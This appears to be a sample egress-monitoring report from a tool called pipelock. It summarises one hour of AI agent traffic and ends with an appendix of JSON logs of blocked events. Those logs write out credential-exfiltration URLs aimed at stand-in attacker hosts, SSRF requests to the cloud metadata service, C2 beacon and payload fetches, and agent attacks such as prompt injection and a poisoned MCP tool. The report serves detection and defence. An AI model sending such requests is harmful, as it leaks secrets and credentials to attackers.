Pipelock Agent Egress Report

HIGH RISK
2026-03-28 09:00:01 UTC to 2026-03-28 09:59:59 UTC | Mode: balanced | v2.1.0
Over a 59-minute observation window, pipelock processed 44 requests across 25 unique domains. 6 critical events were detected, requiring immediate attention. 30 of 44 inspected requests (68%) were allowed without intervention.
Total Events: 48
Allowed: 30
Blocks: 10
Warnings: 4
Criticals: 6
Domains: 25

Activity Timeline

09:00 | Allowed: 12 Warns: 0 Blocks: 8 | Total: 20
09:05 | Allowed: 13 Warns: 3 Blocks: 1 | Total: 17
09:10 | Allowed: 8 Warns: 0 Blocks: 1 | Total: 9

Findings by Category

Category Count Severity MITRE
DLP / Exfiltration 8 critical T1041, T1048.003
Domain Policy 2 high T1071.001
MCP / Tool Abuse 2 high T1059, T1059.007
SSRF 2 high T1552.005
Prompt Injection 1 high T1059.007

DLP by Surface

SURFACE BLOCKS WARNS TOTAL
URL 6 0 6
Request Body 0 1 1
Request Header 0 1 1

Events by Source

AGENT BLOCKS WARNS ALLOWED
10.0.0.2 5 0 19
10.0.0.4 3 1 5
10.0.0.3 2 2 9

Events by Transport

TRANSPORT BLOCKS WARNS ALLOWED
HTTP Fetch 10 2 31
MCP 0 1 2

Top Domains

Domain Total
attacker.example.com 2
169.254.169.254 1
192.168.1.1 1
c2-server.example.com 1
evil-exfil.example.com 1
hnr4kx.oast.fun 1
malware-cdn.example.com 1
pastebin.com 1
webhook.site 1
api.github.com 9
api.anthropic.com 5
api.openai.com 4
api.example.com 2
docs.python.org 2
api.stripe.com 1
cdn.jsdelivr.net 1
crates.io 1
huggingface.co 1
pypi.org 1
registry.npmjs.org 1

MITRE ATT&CK Techniques

TECHNIQUE COUNT
T1041 7
T1059.007 2
T1071.001 2
T1552.005 2
T1048.003 1
T1059 1

Evidence Appendix (16 events)

blocked (dlp) : DLP: Anthropic API Key 2026-03-28 09:02:00 UTC
{ "time": "2026-03-28T09:02:00Z", "level": "warn", "event": "blocked", "method": "GET", "url": "https://evil-exfil.example.com/collect?data=sk-ant-api03-secret", "scanner": "dlp", "reason": "DLP: Anthropic API Key", "client_ip": "10.0.0.2", "mitre_technique": "T1041", "pattern": "Anthropic API Key", "severity": "critical", "transport": "fetch", "category": "credential_exfiltration" }
blocked (dlp) : DLP: GitHub Token 2026-03-28 09:02:05 UTC
{ "time": "2026-03-28T09:02:05Z", "level": "warn", "event": "blocked", "method": "POST", "url": "https://pastebin.com/api/api_post.php", "scanner": "dlp", "reason": "DLP: GitHub Token", "client_ip": "10.0.0.2", "mitre_technique": "T1041", "pattern": "GitHub Token", "severity": "critical", "transport": "fetch", "category": "credential_exfiltration" }
blocked (dlp) : DLP: OpenAI API Key 2026-03-28 09:02:10 UTC
{ "time": "2026-03-28T09:02:10Z", "level": "warn", "event": "blocked", "method": "POST", "url": "https://webhook.site/abc123", "scanner": "dlp", "reason": "DLP: OpenAI API Key", "client_ip": "10.0.0.3", "mitre_technique": "T1041", "pattern": "OpenAI API Key", "severity": "critical", "transport": "forward", "category": "credential_exfiltration" }
blocked (dlp) : DLP: AWS Access Key 2026-03-28 09:04:30 UTC
{ "time": "2026-03-28T09:04:30Z", "level": "warn", "event": "blocked", "method": "GET", "url": "https://attacker.example.com/exfil?env=AKIA5X7EXAMPLE", "scanner": "dlp", "reason": "DLP: AWS Access Key", "client_ip": "10.0.0.2", "mitre_technique": "T1041", "pattern": "AWS Access Key", "severity": "critical", "transport": "fetch", "category": "credential_exfiltration" }
body_dlp (body_dlp) : DLP: Stripe Secret Key in request body 2026-03-28 09:05:30 UTC
{ "time": "2026-03-28T09:05:30Z", "level": "warn", "event": "body_dlp", "method": "POST", "url": "https://api.example.com/upload", "scanner": "body_dlp", "reason": "DLP: Stripe Secret Key in request body", "client_ip": "10.0.0.3", "mitre_technique": "T1041", "pattern": "Stripe Secret Key", "severity": "critical", "transport": "forward", "category": "credential_exfiltration" }
blocked (dlp) : DLP: GitHub Personal Access Token 2026-03-28 09:10:30 UTC
{ "time": "2026-03-28T09:10:30Z", "level": "warn", "event": "blocked", "method": "GET", "url": "https://attacker.example.com/steal?token=ghp_abc123example", "scanner": "dlp", "reason": "DLP: GitHub Personal Access Token", "client_ip": "10.0.0.4", "mitre_technique": "T1041", "pattern": "GitHub Personal Access Token", "severity": "critical", "transport": "forward", "category": "credential_exfiltration" }
blocked (ssrf) : SSRF: link-local metadata service 2026-03-28 09:02:30 UTC
{ "time": "2026-03-28T09:02:30Z", "level": "warn", "event": "blocked", "method": "GET", "url": "https://169.254.169.254/latest/meta-data/iam/security-credentials/", "scanner": "ssrf", "reason": "SSRF: link-local metadata service", "client_ip": "10.0.0.2", "mitre_technique": "T1552.005", "severity": "high", "transport": "fetch", "category": "ssrf" }
blocked (ssrf) : SSRF: private IP range 2026-03-28 09:02:35 UTC
{ "time": "2026-03-28T09:02:35Z", "level": "warn", "event": "blocked", "method": "GET", "url": "http://192.168.1.1/admin", "scanner": "ssrf", "reason": "SSRF: private IP range", "client_ip": "10.0.0.3", "mitre_technique": "T1552.005", "severity": "high", "transport": "forward", "category": "ssrf" }
blocked (blocklist) : blocklist: c2-server.example.com 2026-03-28 09:03:00 UTC
{ "time": "2026-03-28T09:03:00Z", "level": "warn", "event": "blocked", "method": "GET", "url": "https://c2-server.example.com/beacon", "scanner": "blocklist", "reason": "blocklist: c2-server.example.com", "client_ip": "10.0.0.4", "mitre_technique": "T1071.001", "severity": "high", "transport": "forward", "category": "c2_communication" }
blocked (blocklist) : blocklist: malware-cdn.example.com 2026-03-28 09:03:05 UTC
{ "time": "2026-03-28T09:03:05Z", "level": "warn", "event": "blocked", "method": "GET", "url": "https://malware-cdn.example.com/payload.bin", "scanner": "blocklist", "reason": "blocklist: malware-cdn.example.com", "client_ip": "10.0.0.4", "mitre_technique": "T1071.001", "severity": "high", "transport": "forward", "category": "c2_communication" }
response_scan (response) : injection: Prompt Injection 2026-03-28 09:05:00 UTC
{ "time": "2026-03-28T09:05:00Z", "level": "warn", "event": "response_scan", "url": "https://untrusted-api.example.com/data", "scanner": "response", "reason": "injection: Prompt Injection", "client_ip": "10.0.0.2", "mitre_technique": "T1059.007", "severity": "high", "transport": "fetch", "category": "prompt_injection" }
header_dlp (header_dlp) : DLP: Bearer token in non-Authorization header 2026-03-28 09:05:45 UTC
{ "time": "2026-03-28T09:05:45Z", "level": "warn", "event": "header_dlp", "method": "POST", "url": "https://api.example.com/webhook", "scanner": "header_dlp", "reason": "DLP: Bearer token in non-Authorization header", "client_ip": "10.0.0.3", "mitre_technique": "T1041", "pattern": "Bearer Token Header", "severity": "high", "transport": "forward", "category": "credential_exfiltration" }
blocked (dlp) : DLP: high entropy subdomain 2026-03-28 09:06:30 UTC
{ "time": "2026-03-28T09:06:30Z", "level": "warn", "event": "blocked", "method": "GET", "url": "https://hnr4kx.oast.fun/exfil", "scanner": "dlp", "reason": "DLP: high entropy subdomain", "client_ip": "10.0.0.2", "mitre_technique": "T1048.003", "pattern": "Subdomain Entropy", "severity": "high", "transport": "fetch", "category": "dns_exfiltration" }
chain_detection (chain) : chain: read-then-exec (file_read -> bash_exec) 2026-03-28 09:07:00 UTC
{ "time": "2026-03-28T09:07:00Z", "level": "warn", "event": "chain_detection", "scanner": "chain", "reason": "chain: read-then-exec (file_read -\u003e bash_exec)", "client_ip": "10.0.0.2", "mitre_technique": "T1059", "severity": "high", "session": "sess-7f3a", "tool": "bash_exec", "transport": "mcp", "category": "tool_chain" }
mcp_unknown_tool (session_binding) : unknown tool: data_exfil_helper (not in session baseline) 2026-03-28 09:07:15 UTC
{ "time": "2026-03-28T09:07:15Z", "level": "warn", "event": "mcp_unknown_tool", "scanner": "session_binding", "reason": "unknown tool: data_exfil_helper (not in session baseline)", "client_ip": "10.0.0.3", "mitre_technique": "T1059.007", "severity": "high", "session": "sess-2b9c", "tool": "data_exfil_helper", "transport": "mcp", "category": "tool_poisoning" }
anomaly (adaptive) : anomaly: agent score escalated to 0.85 (threshold 0.7) 2026-03-28 09:07:30 UTC
{ "time": "2026-03-28T09:07:30Z", "level": "warn", "event": "anomaly", "scanner": "adaptive", "reason": "anomaly: agent score escalated to 0.85 (threshold 0.7)", "client_ip": "10.0.0.4", "score": 0.85, "severity": "high", "session": "sess-4d1e", "transport": "mcp", "category": "behavioral_anomaly" }